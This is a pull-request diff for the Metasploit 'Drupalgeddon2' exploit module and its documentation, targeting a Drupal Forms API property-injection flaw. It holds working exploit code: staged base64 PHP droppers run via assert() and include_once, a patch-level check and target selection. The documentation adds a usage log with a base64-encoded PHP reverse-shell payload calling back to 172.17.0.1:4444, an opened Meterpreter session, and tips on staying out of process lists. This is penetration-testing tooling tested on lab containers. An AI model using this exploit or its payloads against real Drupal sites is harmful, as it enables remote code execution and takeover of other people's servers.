### PR TITLE
Add Drupal Drupalgeddon 2

### DIFF
--- a/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md
+++ b/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md
@@ -29,6 +29,14 @@ Id  Name
 11  Drupal 8.x (Linux Dropper)
 ```
 
+Automatic targeting means the Drupal version will be detected first.
+Targets with a specific version will do as they're told (regardless of
+what the server is running).
+
+Dropper targets write to disk. In-memory targets don't. Be mindful of
+showing up in someone's process list, though. A dropper might be more
+viable in that regard.
+
 ## Options
 
 **TARGETURI**

--- a/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md
+++ b/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md
@@ -1,8 +1,7 @@
 ## Intro
 
-> This module exploits a Drupal property injection in the Forms API.
-> Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are
-> vulnerable.
+This module exploits a Drupal property injection in the Forms API.
+Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are vulnerable.
 
 ## Setup
 
@@ -70,6 +69,8 @@ Set this to a writable directory without `noexec` for binary payloads.
 Defaults to the current working directory (usually the webapp root).
 
 ## Usage
+
+### Drupal 7.57 from Docker image
 
 ```
 msf5 > use exploit/unix/webapp/drupal_drupalgeddon2

--- a/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md
+++ b/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md
@@ -7,7 +7,12 @@ Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are vulnerable.
 
 Use the provided Docker images here: <https://hub.docker.com/_/drupal/>.
 
-Tested on the 7.57 and 8.4.5 tags (versions).
+Alternatively, you may use TurnKey Linux's distributions:
+
+Drupal 7.54: <http://mirror.turnkeylinux.org/turnkeylinux/images/iso/turnkey-drupal7-14.2-jessie-amd64.iso>
+Drupal 8.3.1: <http://mirror.turnkeylinux.org/turnkeylinux/images/iso/turnkey-drupal8-14.2-jessie-amd64.iso>
+
+Tested on 7.57 and 8.4.5 in Docker and 7.54 and 8.3.1 in TurnKey.
 
 ## Targets
 

--- a/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md
+++ b/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md
@@ -1,0 +1,81 @@
+## Intro
+
+> This module exploits a Drupal property injection in the Forms API.
+> Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are
+> vulnerable.
+
+## Setup
+
+Use the provided Docker images here: <https://hub.docker.com/_/drupal/>.
+
+Tested on the 7.57 and 8.4.5 tags (versions).
+
+## Targets
+
+```
+Id  Name
+--  ----
+0   Automatic (PHP In-Memory)
+1   Automatic (PHP Dropper)
+2   Automatic (Unix In-Memory)
+3   Automatic (Linux Dropper)
+4   Drupal 7.x (PHP In-Memory)
+5   Drupal 7.x (PHP Dropper)
+6   Drupal 7.x (Unix In-Memory)
+7   Drupal 7.x (Linux Dropper)
+8   Drupal 8.x (PHP In-Memory)
+9   Drupal 8.x (PHP Dropper)
+10  Drupal 8.x (Unix In-Memory)
+11  Drupal 8.x (Linux Dropper)
+```
+
+## Options
+
+**PHP_FUNC**
+
+Set this to the PHP function you'd like to execute. Defaults to
+`passthru`.
+
+**DUMP_OUTPUT**
+
+Enable this if you'd like to see HTTP responses, including command
+output. Defaults to `false` unless `cmd/unix/generic` is your payload.
+
+**ForceExploit**
+
+Enable this to force exploitation regardless of the check result.
+Defaults to `false`, meaning the check result is respected.
+
+**WritableDir**
+
+Set this to a writable directory without `noexec` for binary payloads.
+Defaults to the current working directory (usually the webapp root).
+
+## Usage
+
+```
+msf5 > use exploit/unix/webapp/drupal_drupalgeddon2
+msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set rhost 172.17.0.3
+rhost => 172.17.0.3
+msf5 exploit(unix/webapp/drupal_drupalgeddon2) > check
+
+[*] Drupal 7.x targeted at http://172.17.0.3/
+[*] Executing with printf(): mGE9am2CAHbvmGg
+[+] 172.17.0.3:80 The target is vulnerable.
+msf5 exploit(unix/webapp/drupal_drupalgeddon2) > run
+
+[*] Started reverse TCP handler on 172.17.0.1:4444
+[*] Drupal 7.x targeted at http://172.17.0.3/
+[*] Executing with printf(): HmsPV8tYlEbF
+[*] Executing with assert(): eval(base64_decode(Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzE3Mi4xNy4wLjEnOyAkcG9ydCA9IDQ0NDQ7IGlmICgoJGYgPSAnc3RyZWFtX3NvY2tldF9jbGllbnQnKSAmJiBpc19jYWxsYWJsZSgkZikpIHsgJHMgPSAkZigidGNwOi8veyRpcH06eyRwb3J0fSIpOyAkc190eXBlID0gJ3N0cmVhbSc7IH0gaWYgKCEkcyAmJiAoJGYgPSAnZnNvY2tvcGVuJykgJiYgaXNfY2FsbGFibGUoJGYpKSB7ICRzID0gJGYoJGlwLCAkcG9ydCk7ICRzX3R5cGUgPSAnc3RyZWFtJzsgfSBpZiAoISRzICYmICgkZiA9ICdzb2NrZXRfY3JlYXRlJykgJiYgaXNfY2FsbGFibGUoJGYpKSB7ICRzID0gJGYoQUZfSU5FVCwgU09DS19TVFJFQU0sIFNPTF9UQ1ApOyAkcmVzID0gQHNvY2tldF9jb25uZWN0KCRzLCAkaXAsICRwb3J0KTsgaWYgKCEkcmVzKSB7IGRpZSgpOyB9ICRzX3R5cGUgPSAnc29ja2V0JzsgfSBpZiAoISRzX3R5cGUpIHsgZGllKCdubyBzb2NrZXQgZnVuY3MnKTsgfSBpZiAoISRzKSB7IGRpZSgnbm8gc29ja2V0Jyk7IH0gc3dpdGNoICgkc190eXBlKSB7IGNhc2UgJ3N0cmVhbSc6ICRsZW4gPSBmcmVhZCgkcywgNCk7IGJyZWFrOyBjYXNlICdzb2NrZXQnOiAkbGVuID0gc29ja2V0X3JlYWQoJHMsIDQpOyBicmVhazsgfSBpZiAoISRsZW4pIHsgZGllKCk7IH0gJGEgPSB1bnBhY2soIk5s.ZW4iLCAkbGVuKTsgJGxlbiA9ICRhWydsZW4nXTsgJGIgPSAnJzsgd2hpbGUgKHN0cmxlbigkYikgPCAkbGVuKSB7IHN3aXRjaCAoJHNfdHlwZSkgeyBjYXNlICdzdHJlYW0nOiAkYiAuPSBmcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7IGNhc2UgJ3NvY2tldCc6ICRiIC49IHNvY2tldF9yZWFkKCRzLCAkbGVuLXN0cmxlbigkYikpOyBicmVhazsgfSB9ICRHTE9CQUxTWydtc2dzb2NrJ10gPSAkczsgJEdMT0JBTFNbJ21zZ3NvY2tfdHlwZSddID0gJHNfdHlwZTsgaWYgKGV4dGVuc2lvbl9sb2FkZWQoJ3N1aG9zaW4nKSAmJiBpbmlfZ2V0KCdzdWhvc2luLmV4ZWN1dG9yLmRpc2FibGVfZXZhbCcpKSB7ICRzdWhvc2luX2J5cGFzcz1jcmVhdGVfZnVuY3Rpb24oJycsICRiKTsgJHN1aG9zaW5fYnlwYXNzKCk7IH0gZWxzZSB7IGV2YWwoJGIpOyB9IGRpZSgpOw));
+[*] Sending stage (37775 bytes) to 172.17.0.3
+[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.3:43864) at 2018-04-24 03:55:25 -0500
+
+meterpreter > getuid
+Server username: www-data (33)
+meterpreter > sysinfo
+Computer    : b3a405d5568a
+OS          : [redacted]
+Meterpreter : php/linux
+meterpreter >
+```

--- a/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md
+++ b/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md
@@ -82,16 +82,18 @@ verbose => true
 msf5 exploit(unix/webapp/drupal_drupalgeddon2) > check
 
 [*] Drupal 7.x targeted at http://172.17.0.3/
-[*] Executing with printf(): mGE9am2CAHbvmGg
+[+] Drupal appears unpatched in CHANGELOG.txt
+[*] Executing with printf(): sdHl4fLONOKfVZL1cEvXuJCuSkue
 [+] 172.17.0.3:80 The target is vulnerable.
 msf5 exploit(unix/webapp/drupal_drupalgeddon2) > run
 
 [*] Started reverse TCP handler on 172.17.0.1:4444
 [*] Drupal 7.x targeted at http://172.17.0.3/
-[*] Executing with printf(): HmsPV8tYlEbF
+[+] Drupal appears unpatched in CHANGELOG.txt
+[*] Executing with printf(): paAHBb9jyovEnLrrT5lMIB
 [*] Executing with assert(): eval(base64_decode(Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzE3Mi4xNy4wLjEnOyAkcG9ydCA9IDQ0NDQ7IGlmICgoJGYgPSAnc3RyZWFtX3NvY2tldF9jbGllbnQnKSAmJiBpc19jYWxsYWJsZSgkZikpIHsgJHMgPSAkZigidGNwOi8veyRpcH06eyRwb3J0fSIpOyAkc190eXBlID0gJ3N0cmVhbSc7IH0gaWYgKCEkcyAmJiAoJGYgPSAnZnNvY2tvcGVuJykgJiYgaXNfY2FsbGFibGUoJGYpKSB7ICRzID0gJGYoJGlwLCAkcG9ydCk7ICRzX3R5cGUgPSAnc3RyZWFtJzsgfSBpZiAoISRzICYmICgkZiA9ICdzb2NrZXRfY3JlYXRlJykgJiYgaXNfY2FsbGFibGUoJGYpKSB7ICRzID0gJGYoQUZfSU5FVCwgU09DS19TVFJFQU0sIFNPTF9UQ1ApOyAkcmVzID0gQHNvY2tldF9jb25uZWN0KCRzLCAkaXAsICRwb3J0KTsgaWYgKCEkcmVzKSB7IGRpZSgpOyB9ICRzX3R5cGUgPSAnc29ja2V0JzsgfSBpZiAoISRzX3R5cGUpIHsgZGllKCdubyBzb2NrZXQgZnVuY3MnKTsgfSBpZiAoISRzKSB7IGRpZSgnbm8gc29ja2V0Jyk7IH0gc3dpdGNoICgkc190eXBlKSB7IGNhc2UgJ3N0cmVhbSc6ICRsZW4gPSBmcmVhZCgkcywgNCk7IGJyZWFrOyBjYXNlICdzb2NrZXQnOiAkbGVuID0gc29ja2V0X3JlYWQoJHMsIDQpOyBicmVhazsgfSBpZiAoISRsZW4pIHsgZGllKCk7IH0gJGEgPSB1bnBhY2soIk5s.ZW4iLCAkbGVuKTsgJGxlbiA9ICRhWydsZW4nXTsgJGIgPSAnJzsgd2hpbGUgKHN0cmxlbigkYikgPCAkbGVuKSB7IHN3aXRjaCAoJHNfdHlwZSkgeyBjYXNlICdzdHJlYW0nOiAkYiAuPSBmcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7IGNhc2UgJ3NvY2tldCc6ICRiIC49IHNvY2tldF9yZWFkKCRzLCAkbGVuLXN0cmxlbigkYikpOyBicmVhazsgfSB9ICRHTE9CQUxTWydtc2dzb2NrJ10gPSAkczsgJEdMT0JBTFNbJ21zZ3NvY2tfdHlwZSddID0gJHNfdHlwZTsgaWYgKGV4dGVuc2lvbl9sb2FkZWQoJ3N1aG9zaW4nKSAmJiBpbmlfZ2V0KCdzdWhvc2luLmV4ZWN1dG9yLmRpc2FibGVfZXZhbCcpKSB7ICRzdWhvc2luX2J5cGFzcz1jcmVhdGVfZnVuY3Rpb24oJycsICRiKTsgJHN1aG9zaW5fYnlwYXNzKCk7IH0gZWxzZSB7IGV2YWwoJGIpOyB9IGRpZSgpOw));
 [*] Sending stage (37775 bytes) to 172.17.0.3
-[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.3:43864) at 2018-04-24 03:55:25 -0500
+[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.3:46654) at 2018-04-24 23:25:17 -0500
 
 meterpreter > getuid
 Server username: www-data (33)

--- a/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md
+++ b/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md
@@ -66,7 +66,8 @@ Defaults to `false`, meaning the check result is respected.
 **WritableDir**
 
 Set this to a writable directory without `noexec` for binary payloads.
-Defaults to the current working directory (usually the webapp root).
+Defaults to `/tmp`, but other options may include `/var/tmp` and
+`/dev/shm`.
 
 ## Usage
 

--- a/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md
+++ b/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md
@@ -70,7 +70,7 @@ Defaults to the current working directory (usually the webapp root).
 
 ## Usage
 
-### Drupal 7.57 from Docker image
+Drupal 7.57 from the Docker image is tested below.
 
 ```
 msf5 > use exploit/unix/webapp/drupal_drupalgeddon2

--- a/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md
+++ b/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md
@@ -31,6 +31,11 @@ Id  Name
 
 ## Options
 
+**TARGETURI**
+
+Set this to the remote path of the vulnerable Drupal install. Defaults
+to `/` for the web root.
+
 **PHP_FUNC**
 
 Set this to the PHP function you'd like to execute. Defaults to
@@ -40,6 +45,11 @@ Set this to the PHP function you'd like to execute. Defaults to
 
 Enable this if you'd like to see HTTP responses, including command
 output. Defaults to `false` unless `cmd/unix/generic` is your payload.
+
+**VERBOSE**
+
+Enable this to show what function and command were executed. Defaults to
+`false` due to the sometimes excessive output.
 
 **ForceExploit**
 
@@ -57,6 +67,8 @@ Defaults to the current working directory (usually the webapp root).
 msf5 > use exploit/unix/webapp/drupal_drupalgeddon2
 msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set rhost 172.17.0.3
 rhost => 172.17.0.3
+msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set verbose true
+verbose => true
 msf5 exploit(unix/webapp/drupal_drupalgeddon2) > check
 
 [*] Drupal 7.x targeted at http://172.17.0.3/

--- a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
+++ b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
@@ -43,6 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'Platform'       => ['php', 'unix', 'linux'],
       'Arch'           => [ARCH_PHP, ARCH_CMD, ARCH_X86, ARCH_X64],
       'Privileged'     => false,
+      'Payload'        => {'BadChars' => '&'},
       # XXX: Using "x" in Gem::Version::new isn't technically appropriate
       'Targets'        => [
         #
@@ -50,13 +51,11 @@ class MetasploitModule < Msf::Exploit::Remote
         #
         ['Automatic (PHP In-Memory)',
          'Platform'    => 'php',
-         'Arch'        => ARCH_PHP,
-         'Payload'     => {'Encoder' => 'php/base64'}
+         'Arch'        => ARCH_PHP
         ],
         ['Automatic (PHP Dropper)',
          'Platform'    => 'php',
-         'Arch'        => ARCH_PHP,
-         'Payload'     => {'Encoder' => 'php/base64'}
+         'Arch'        => ARCH_PHP
         ],
         ['Automatic (Unix In-Memory)',
          'Platform'    => 'unix',
@@ -72,13 +71,11 @@ class MetasploitModule < Msf::Exploit::Remote
         ['Drupal 7.x (PHP In-Memory)',
          'Platform'    => 'php',
          'Arch'        => ARCH_PHP,
-         'Payload'     => {'Encoder' => 'php/base64'},
          'Version'     => Gem::Version.new('7.x')
         ],
         ['Drupal 7.x (PHP Dropper)',
          'Platform'    => 'php',
          'Arch'        => ARCH_PHP,
-         'Payload'     => {'Encoder' => 'php/base64'},
          'Version'     => Gem::Version.new('7.x')
         ],
         ['Drupal 7.x (Unix In-Memory)',
@@ -97,13 +94,11 @@ class MetasploitModule < Msf::Exploit::Remote
         ['Drupal 8.x (PHP In-Memory)',
          'Platform'    => 'php',
          'Arch'        => ARCH_PHP,
-         'Payload'     => {'Encoder' => 'php/base64'},
          'Version'     => Gem::Version.new('8.x')
         ],
         ['Drupal 8.x (PHP Dropper)',
          'Platform'    => 'php',
          'Arch'        => ARCH_PHP,
-         'Payload'     => {'Encoder' => 'php/base64'},
          'Version'     => Gem::Version.new('8.x')
         ],
         ['Drupal 8.x (Unix In-Memory)',

--- a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
+++ b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
@@ -9,6 +9,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::CmdStager
+  include Msf::Exploit::FileDropper
 
   def initialize(info = {})
     super(update_info(info,
@@ -52,6 +53,11 @@ class MetasploitModule < Msf::Exploit::Remote
          'Arch'        => ARCH_PHP,
          'Payload'     => {'Encoder' => 'php/base64'}
         ],
+        ['Automatic (PHP Dropper)',
+         'Platform'    => 'php',
+         'Arch'        => ARCH_PHP,
+         'Payload'     => {'Encoder' => 'php/base64'}
+        ],
         ['Automatic (Unix In-Memory)',
          'Platform'    => 'unix',
          'Arch'        => ARCH_CMD
@@ -64,6 +70,12 @@ class MetasploitModule < Msf::Exploit::Remote
         # Drupal 7.x targets (PHP, cmd/unix, native)
         #
         ['Drupal 7.x (PHP In-Memory)',
+         'Platform'    => 'php',
+         'Arch'        => ARCH_PHP,
+         'Payload'     => {'Encoder' => 'php/base64'},
+         'Version'     => Gem::Version.new('7.x')
+        ],
+        ['Drupal 7.x (PHP Dropper)',
          'Platform'    => 'php',
          'Arch'        => ARCH_PHP,
          'Payload'     => {'Encoder' => 'php/base64'},
@@ -83,6 +95,12 @@ class MetasploitModule < Msf::Exploit::Remote
         # Drupal 8.x targets (PHP, cmd/unix, native)
         #
         ['Drupal 8.x (PHP In-Memory)',
+         'Platform'    => 'php',
+         'Arch'        => ARCH_PHP,
+         'Payload'     => {'Encoder' => 'php/base64'},
+         'Version'     => Gem::Version.new('8.x')
+        ],
+        ['Drupal 8.x (PHP Dropper)',
          'Platform'    => 'php',
          'Arch'        => ARCH_PHP,
          'Payload'     => {'Encoder' => 'php/base64'},
@@ -110,7 +128,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    token = Rex::Text.rand_text_alphanumeric(8..42)
+    token = random_crap
 
     res = execute_command(token, func: 'printf')
 
@@ -129,11 +147,27 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     case target.name
-    when /PHP/
+    when /PHP In-Memory/
       execute_command(payload.encoded, func: 'assert')
-    when /In-Memory/
+    when /PHP Dropper/
+      tmpfile = random_crap
+      encoded = Rex::Text.encode_base64("<?php #{payload.encoded}; ?>")
+
+      stage1 = %Q{
+        file_put_contents("#{tmpfile}", base64_decode("#{encoded}"));
+      }
+
+      stage2 = %Q{
+        include_once("#{tmpfile}");
+      }
+
+      register_file_for_cleanup(tmpfile)
+
+      execute_command(stage1.strip, func: 'assert')
+      execute_command(stage2.strip, func: 'assert')
+    when /Unix In-Memory/
       execute_command(payload.encoded)
-    when /Dropper/
+    when /Linux Dropper/
       execute_cmdstager
     end
   end
@@ -273,6 +307,10 @@ class MetasploitModule < Msf::Exploit::Remote
       'vars_get'  => vars_get,
       'vars_post' => vars_post
     )
+  end
+
+  def random_crap
+    Rex::Text.rand_text_alphanumeric(8..42)
   end
 
 end

--- a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
+++ b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
@@ -254,7 +254,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def execute_command(cmd, opts = {})
-    # TODO: passthru() may be disabled, so try others
     func = opts[:func] || datastore['PHP_FUNC'] || 'passthru'
 
     vprint_status("Executing with #{func}(): #{cmd}")
@@ -292,6 +291,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     return unless res && res.code == 200
 
+    # Check for an X-Generator header
     @version =
       case res.headers['X-Generator']
       when /Drupal 7/
@@ -300,6 +300,9 @@ class MetasploitModule < Msf::Exploit::Remote
         Gem::Version.new('8.x')
       end
 
+    return @version if @version
+
+    # Check for a <meta> tag
     generator = res.get_html_document.at(
       '//meta[@name = "Generator"]/@content'
     )

--- a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
+++ b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
@@ -141,6 +141,11 @@ class MetasploitModule < Msf::Exploit::Remote
       return CheckCode::Unknown
     end
 
+    if drupal_unpatched?
+      print_status('Drupal appears unpatched in CHANGELOG.txt')
+      checkcode = CheckCode::Appears
+    end
+
     token = random_crap
     res   = execute_command(token, func: 'printf')
 
@@ -333,6 +338,32 @@ class MetasploitModule < Msf::Exploit::Remote
       when /Drupal 8/
         Gem::Version.new('8.x')
       end
+  end
+
+  def drupal_unpatched?
+    unpatched = true
+
+    # Check for patch level in CHANGELOG.txt
+    uri =
+      case @version.to_s
+      when '7.x'
+        normalize_uri(target_uri.path, 'CHANGELOG.txt')
+      when '8.x'
+        normalize_uri(target_uri.path, 'core/CHANGELOG.txt')
+      end
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri'    => uri
+    )
+
+    return unless res && res.code == 200
+
+    if res.body.include?('SA-CORE-2018-002')
+      unpatched = false
+    end
+
+    unpatched
   end
 
   def exploit_drupal7(func, code)

--- a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
+++ b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
@@ -39,11 +39,19 @@ class MetasploitModule < Msf::Exploit::Remote
       ],
       'DisclosureDate' => 'Mar 28 2018',
       'License'        => MSF_LICENSE,
-      'Platform'       => ['unix', 'linux'],
-      'Arch'           => [ARCH_CMD, ARCH_X86, ARCH_X64],
+      'Platform'       => ['php', 'unix', 'linux'],
+      'Arch'           => [ARCH_PHP, ARCH_CMD, ARCH_X86, ARCH_X64],
       'Privileged'     => false,
       # XXX: Using "x" in Gem::Version::new isn't technically appropriate
       'Targets'        => [
+        #
+        # Automatic targets (PHP, cmd/unix, native)
+        #
+        ['Automatic (PHP In-Memory)',
+         'Platform'    => 'php',
+         'Arch'        => ARCH_PHP,
+         'Payload'     => {'Encoder' => 'php/base64'}
+        ],
         ['Automatic (Unix In-Memory)',
          'Platform'    => 'unix',
          'Arch'        => ARCH_CMD
@@ -51,6 +59,15 @@ class MetasploitModule < Msf::Exploit::Remote
         ['Automatic (Linux Dropper)',
          'Platform'    => 'linux',
          'Arch'        => [ARCH_X86, ARCH_X64]
+        ],
+        #
+        # Drupal 7.x targets (PHP, cmd/unix, native)
+        #
+        ['Drupal 7.x (PHP In-Memory)',
+         'Platform'    => 'php',
+         'Arch'        => ARCH_PHP,
+         'Payload'     => {'Encoder' => 'php/base64'},
+         'Version'     => Gem::Version.new('7.x')
         ],
         ['Drupal 7.x (Unix In-Memory)',
          'Platform'    => 'unix',
@@ -61,6 +78,15 @@ class MetasploitModule < Msf::Exploit::Remote
          'Platform'    => 'linux',
          'Arch'        => [ARCH_X86, ARCH_X64],
          'Version'     => Gem::Version.new('7.x')
+        ],
+        #
+        # Drupal 8.x targets (PHP, cmd/unix, native)
+        #
+        ['Drupal 8.x (PHP In-Memory)',
+         'Platform'    => 'php',
+         'Arch'        => ARCH_PHP,
+         'Payload'     => {'Encoder' => 'php/base64'},
+         'Version'     => Gem::Version.new('8.x')
         ],
         ['Drupal 8.x (Unix In-Memory)',
          'Platform'    => 'unix',
@@ -73,11 +99,7 @@ class MetasploitModule < Msf::Exploit::Remote
          'Version'     => Gem::Version.new('8.x')
         ]
       ],
-      'DefaultTarget'  => 0, # Automatic (Unix In-Memory)
-      'DefaultOptions' => {
-        'PAYLOAD'      => 'cmd/unix/generic',
-        'CMD'          => 'id; uname -a'
-      }
+      'DefaultTarget'  => 0 # Automatic (PHP In-Memory)
     ))
 
     register_options([
@@ -107,6 +129,8 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     case target.name
+    when /PHP/
+      execute_command(payload.encoded, func: 'assert')
     when /In-Memory/
       execute_command(payload.encoded)
     when /Dropper/
@@ -138,7 +162,7 @@ class MetasploitModule < Msf::Exploit::Remote
         exploit_drupal8(func, cmd)
       end
 
-    unless res && res.code == 200
+    unless res && res.code == 200 || session_created?
       print_error("Unexpected reply: #{res.inspect}")
       return
     end

--- a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
+++ b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
@@ -8,7 +8,8 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::CmdStager
+  # XXX: CmdStager can't handle badchars
+  include Msf::Exploit::PhpEXE
   include Msf::Exploit::FileDropper
 
   def initialize(info = {})
@@ -43,7 +44,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'Platform'       => ['php', 'unix', 'linux'],
       'Arch'           => [ARCH_PHP, ARCH_CMD, ARCH_X86, ARCH_X64],
       'Privileged'     => false,
-      'Payload'        => {'BadChars' => '&'},
+      'Payload'        => {'BadChars' => '&>\''},
       # XXX: Using "x" in Gem::Version::new isn't technically appropriate
       'Targets'        => [
         #
@@ -120,21 +121,39 @@ class MetasploitModule < Msf::Exploit::Remote
       OptString.new('PHP_FUNC',  [true, 'PHP function to execute', 'passthru']),
       OptBool.new('DUMP_OUTPUT', [false, 'If output should be dumped', false])
     ])
+
+    register_advanced_options([
+      OptBool.new('ForceExploit',  [false, 'Override check result', false]),
+      OptString.new('WritableDir', [false, 'Writable dir for dropped binaries'])
+    ])
   end
 
   def check
-    token = random_crap
+    checkcode = CheckCode::Safe
 
-    res = execute_command(token, func: 'printf')
-
-    if res && res.body.include?(token)
-      return CheckCode::Vulnerable
+    if drupal_version
+      print_status("Drupal #{@version} targeted at #{full_uri}")
+      checkcode = CheckCode::Detected
+    else
+      print_error('Could not configure Drupal version')
+      return CheckCode::Unknown
     end
 
-    CheckCode::Safe
+    token = random_crap
+    res   = execute_command(token, func: 'printf')
+
+    if res && res.body.start_with?(token)
+      checkcode = CheckCode::Vulnerable
+    end
+
+    checkcode
   end
 
   def exploit
+    unless check == CheckCode::Vulnerable || datastore['ForceExploit']
+      fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
+    end
+
     if datastore['PAYLOAD'] == 'cmd/unix/generic'
       print_warning('Enabling DUMP_OUTPUT for cmd/unix/generic')
       # XXX: Naughty datastore modification
@@ -143,69 +162,129 @@ class MetasploitModule < Msf::Exploit::Remote
 
     case target.name
     when /PHP In-Memory/
-      execute_command(payload.encoded, func: 'assert')
-    when /PHP Dropper/
-      tmpfile = random_crap
-      encoded = Rex::Text.encode_base64("<?php #{payload.encoded}; ?>")
-
-      stage1 = %Q{
-        file_put_contents("#{tmpfile}", base64_decode("#{encoded}"));
-      }
-
-      stage2 = %Q{
-        include_once("#{tmpfile}");
-      }
-
-      register_file_for_cleanup(tmpfile)
-
-      execute_command(stage1.strip, func: 'assert')
-      execute_command(stage2.strip, func: 'assert')
+      case @version.to_s
+      when '7.x'
+        # In-process execution when assert() is enabled
+        execute_command(payload.encoded, func: 'assert')
+      when '8.x'
+        # XXX: This will spawn a *very* obvious process
+        execute_command("php -r '#{payload.encoded}'")
+      end
     when /Unix In-Memory/
       execute_command(payload.encoded)
-    when /Linux Dropper/
-      execute_cmdstager
+    when /PHP Dropper/, /Linux Dropper/
+      case @version.to_s
+      when '7.x'
+        execute_dropper7
+      when '8.x'
+        execute_dropper8
+      end
     end
+  end
+
+  # XXX: Ivars are being preserved
+  def cleanup
+    begin
+      remove_instance_variable(:@version)
+    rescue NameError
+    end
+
+    super
+  end
+
+  def execute_dropper7
+    php_file = "#{random_crap}.php"
+
+    # Return the PHP payload or a PHP binary dropper
+    dropper = get_write_exec_payload(
+      writable_path: datastore['WritableDir'],
+      unlink_self:   true # Worth a shot
+    )
+
+    # Encode away potential badchars with Base64
+    dropper = Rex::Text.encode_base64(dropper)
+
+    # Stage 1 decodes the PHP and writes it to disk
+    stage1 = %Q{
+      file_put_contents("#{php_file}", base64_decode("#{dropper}"));
+    }
+
+    # Stage 2 executes said PHP in-process
+    stage2 = %Q{
+      include_once("#{php_file}");
+    }
+
+    # :unlink_self may not work, so let's make sure
+    register_file_for_cleanup(php_file)
+
+    # Hopefully pop our shell with assert()
+    execute_command(stage1.strip, func: 'assert')
+    execute_command(stage2.strip, func: 'assert')
+  end
+
+  def execute_dropper8
+    php_file = "#{random_crap}.php"
+
+    # Return the PHP payload or a PHP binary dropper
+    dropper = get_write_exec_payload(
+      writable_path: datastore['WritableDir'],
+      unlink_self:   true # Worth a shot
+    )
+
+    # Encode away potential badchars with Base64
+    dropper = Rex::Text.encode_base64(dropper)
+
+    # :unlink_self may not work, so let's make sure
+    register_file_for_cleanup(php_file)
+
+    # Write the payload or dropper to disk (!)
+    # NOTE: Analysis indicates > is a badchar for 8.x
+    execute_command("echo #{dropper} | base64 -d | tee #{php_file}")
+
+    # Attempt in-process execution of our PHP script
+    send_request_cgi(
+      'method' => 'GET',
+      'uri'    => normalize_uri(target_uri.path, php_file)
+    )
+
+    return if session_created?
+
+    # Last-ditch effort to get a shell with PHP CLI
+    execute_command("php #{php_file}")
   end
 
   def execute_command(cmd, opts = {})
     # TODO: passthru() may be disabled, so try others
     func = opts[:func] || datastore['PHP_FUNC'] || 'passthru'
 
-    @version ||=
-      if target['Version']
-        target['Version'].to_s
-      else
-        detect_version.to_s
-      end
-
-    return if @version.empty?
-
-    unless @version_printed
-      print_good("Drupal #{@version} detected at #{full_uri}")
-      @version_printed = true
-    end
-
-    vprint_status("Executing with #{func}(): #{cmd}")
+    print_status("Executing with #{func}(): #{cmd}")
 
     res =
-      case @version
+      case @version.to_s
       when '7.x'
         exploit_drupal7(func, cmd)
       when '8.x'
         exploit_drupal8(func, cmd)
       end
 
-    unless res && res.code == 200 || session_created?
+    if res && res.code != 200
       print_error("Unexpected reply: #{res.inspect}")
       return
     end
 
-    print_line(res.body) if datastore['DUMP_OUTPUT']
+    if res && datastore['DUMP_OUTPUT']
+      print_line(res.body)
+    end
 
     res
   end
 
-  def detect_version
+  def drupal_version
+    if target['Version']
+      @version = target['Version']
+      return @version
+    end
+
     res = send_request_cgi(
       'method' => 'GET',
